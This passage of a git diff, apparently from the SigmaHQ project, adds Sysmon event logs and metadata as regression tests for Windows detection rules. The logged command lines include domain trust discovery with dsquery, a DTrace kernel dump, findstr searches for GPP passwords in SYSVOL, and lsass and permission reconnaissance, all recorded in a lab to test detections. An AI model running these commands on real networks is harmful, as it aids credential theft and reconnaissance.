"ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/info.yml b/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/info.yml new file mode 100644 index 000000000..2b8e71fe3 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/info.yml @@ -0,0 +1,12 @@ +id: 13b0c2d7-2056-4ce4-85df-79f7e499dd49 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: a20def93-0709-4eae-9bd2-31206e21e6b2 + title: DriverQuery.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx new file mode 100644 index 000000000..c02ab7830 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json new file mode 100644 index 000000000..df3ca069d --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:48:36.392892Z" + } + }, + "EventRecordID": 9075053, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:48:36.383", + "ProcessGuid": "5AA13A44-D534-68FC-FF30-000000004002", + "ProcessId": 168, + "Image": "C:\\Windows\\System32\\dsquery.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Microsoft AD DS/LDS query command line utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "dsquery.exe", + "CommandLine": "dsquery * -filter \"(objectClass=trustedDomain)\" -attr *", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=D6F0AD64BECE9028108C0C807E3C3A0EEAF4C31C,MD5=3A94027001259B03449AB5DC8B764E83,SHA256=A3720A70B407F069E21F2EF759236C2A7871A03D00B0AC7F0ACD201DA1086CB0,IMPHASH=0C732EE7E7F8F559606E6ADF3AA39CDC", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml new file mode 100644 index 000000000..cfd84a7ca --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml @@ -0,0 +1,13 @@ +id: 91c77c64-7f4f-4bba-be6a-42377c97b48a +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3bad990e-4848-4a78-9530-b427d854aac0 + title: Domain Trust Discovery Via Dsquery +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx b/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx new file mode 100644 index 000000000..fe978d049 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json b/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json new file mode 100644 index 000000000..0993a5ac0 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json @@ -0,0 +1,132 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-27T00:04:12.105550Z" + } + }, + "EventRecordID": 33630917, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3380, + "ThreadID": 4420 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-27 00:04:12.104", + "ProcessGuid": "5AA13A44-B6FC-68FE-0802-000000004102", + "ProcessId": 2524, + "Image": "C:\\Program Files\\DTrace\\dtrace.exe", + "FileVersion": "10.0.22621.1 (WinBuild.160101.0800)", + "Description": "DTrace/NT", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "dtrace.exe", + "CommandLine": "dtrace.exe -w \"syscall:::return {lkd(0); exit(0);}\"", + "CurrentDirectory": "C:\\Program Files\\DTrace\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", + "LogonId": "0xc47e5", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=5ECD16526AB7288C9910692B3BC73041605CD0CF,MD5=AE913F95E1F94B071DED1FFBB60EDDBD,SHA256=75C00C03BB318FCDB329D29E705C7815E14E48C801D6322984C899FAEDDBBF55,IMPHASH=DC497C8CA3DFCDF940058114BA89B413", + "ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102", + "ParentProcessId": 10508, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-27T00:04:13.045253Z" + } + }, + "EventRecordID": 33630948, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3380, + "ThreadID": 4420 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-27 00:04:13.044", + "ProcessGuid": "5AA13A44-B6FD-68FE-0902-000000004102", + "ProcessId": 7748, + "Image": "C:\\Program Files\\DTrace\\dtrace.exe", + "FileVersion": "10.0.22621.1 (WinBuild.160101.0800)", + "Description": "DTrace/NT", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "dtrace.exe", + "CommandLine": "dtrace.exe -w -n \"syscall:::return {lkd(0); exit(0);}\"", + "CurrentDirectory": "C:\\Program Files\\DTrace\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", + "LogonId": "0xc47e5", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=5ECD16526AB7288C9910692B3BC73041605CD0CF,MD5=AE913F95E1F94B071DED1FFBB60EDDBD,SHA256=75C00C03BB318FCDB329D29E705C7815E14E48C801D6322984C899FAEDDBBF55,IMPHASH=DC497C8CA3DFCDF940058114BA89B413", + "ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102", + "ParentProcessId": 10508, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml b/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml new file mode 100644 index 000000000..88dc48265 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml @@ -0,0 +1,12 @@ +id: c81d2cc0-3296-47fd-b57d-334b3a17ab02 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 7124aebe-4cd7-4ccb-8df0-6d6b93c96795 + title: Suspicious Kernel Dump Using Dtrace +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx b/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx new file mode 100644 index 000000000..65db5293c Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json b/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json new file mode 100644 index 000000000..510ba4156 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-27T00:08:16.515256Z" + } + }, + "EventRecordID": 33635575, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3380, + "ThreadID": 4420 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-27 00:08:16.514", + "ProcessGuid": "5AA13A44-B7F0-68FE-2902-000000004102", + "ProcessId": 9040, + "Image": "C:\\Windows\\explorer.exe", + "FileVersion": "10.0.20348.3692 (WinBuild.160101.0800)", + "Description": "Windows Explorer", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "EXPLORER.EXE", + "CommandLine": "explorer shell:MyComputerFolder", + "CurrentDirectory": "C:\\Program Files\\DTrace\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", + "LogonId": "0xc47e5", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=8BAA602FDC6BA67545C0717E2B9063A0BFE3F278,MD5=1FB8907465FB58429762D97C1FBEA04A,SHA256=53F36699C35C8F2360608A79F0809BA888C61F15886AE2B1F209A3E9B896CBA7,IMPHASH=BECD30EE79098B21A5BA5E5CF0E18B83", + "ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102", + "ParentProcessId": 10508, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml b/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml new file mode 100644 index 000000000..426d1a0da --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml @@ -0,0 +1,12 @@ +id: ddbc40a4-117f-4359-9a22-f943dd25535f +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: c3d76afc-93df-461e-8e67-9b2bad3f2ac4 + title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx new file mode 100644 index 000000000..884753da5 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json new file mode 100644 index 000000000..98a4da0c2 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:50:13.199218Z" + } + }, + "EventRecordID": 9105822, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:50:13.191", + "ProcessGuid": "5AA13A44-D595-68FC-0A31-000000004002", + "ProcessId": 7772, + "Image": "C:\\Windows\\System32\\findstr.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Find String (QGREP) Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "FINDSTR.EXE", + "CommandLine": "findstr /S cpassword \\\\AR-WIN-DC\\sysvol\\*.xml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml new file mode 100644 index 000000000..2ad8b04be --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml @@ -0,0 +1,13 @@ +id: 1f7942f7-fd5d-40e1-ac60-df1298f49bb0 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 91a2c315-9ee6-4052-a853-6f6a8238f90d + title: Findstr GPP Passwords +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx b/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx new file mode 100644 index 000000000..d02e83bf9 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.json b/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.json new file mode 100644 index 000000000..b194da7e5 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:41:46.744119Z" + } + }, + "EventRecordID": 12151329, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:41:46.742", + "ProcessGuid": "5AA13A44-0BDA-68FD-7836-000000004002", + "ProcessId": 8892, + "Image": "C:\\Windows\\System32\\findstr.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Find String (QGREP) Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "FINDSTR.EXE", + "CommandLine": "findstr lsass", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", + "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002", + "ParentProcessId": 3204, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/info.yml new file mode 100644 index 000000000..9181cab89 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/info.yml @@ -0,0 +1,13 @@ +id: 241a8371-1554-4cfc-8a51-c671669f4a71 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: fe63010f-8823-4864-a96b-a7b4a0f7b929 + title: LSASS Process Reconnaissance Via Findstr.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.evtx b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.evtx new file mode 100644 index 000000000..510394a4d Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.json b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.json new file mode 100644 index 000000000..05d65fd77 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.json @@ -0,0 +1,198 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:47:01.671694Z" + } + }, + "EventRecordID": 12249325, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:47:01.664", + "ProcessGuid": "5AA13A44-0D15-68FD-B436-000000004002", + "ProcessId": 2764, + "Image": "C:\\Windows\\System32\\icacls.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "-", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "iCACLS.EXE", + "CommandLine": "icacls \"C:\\Program Files\\*\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=0EB3DC9113AE28D77A85A52B3BF7B79A4B7FD24E,MD5=4B8207877186FAFFB90E3A4D9358CBA6,SHA256=054355C415F5686DA598011065E6FDF6BED35C5FDDA81BC5BF22B9D093CC30E2,IMPHASH=446163A548337B5BCF2727BCD1CFB399", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:47:01.679477Z" + } + }, + "EventRecordID": 12249342, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:47:01.673", + "ProcessGuid": "5AA13A44-0D15-68FD-B536-000000004002", + "ProcessId": 9016, + "Image": "C:\\Windows\\System32\\findstr.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Find String (QGREP) Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "FINDSTR.EXE", + "CommandLine": "findstr \"(M)\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:47:01.687849Z" + } + }, + "EventRecordID": 12249358, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:47:01.681", + "ProcessGuid": "5AA13A44-0D15-68FD-B636-000000004002", + "ProcessId": 3356, + "Image": "C:\\Windows\\System32\\findstr.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Find String (QGREP) Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "FINDSTR.EXE", + "CommandLine": "findstr \"Everyone\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml new file mode 100644 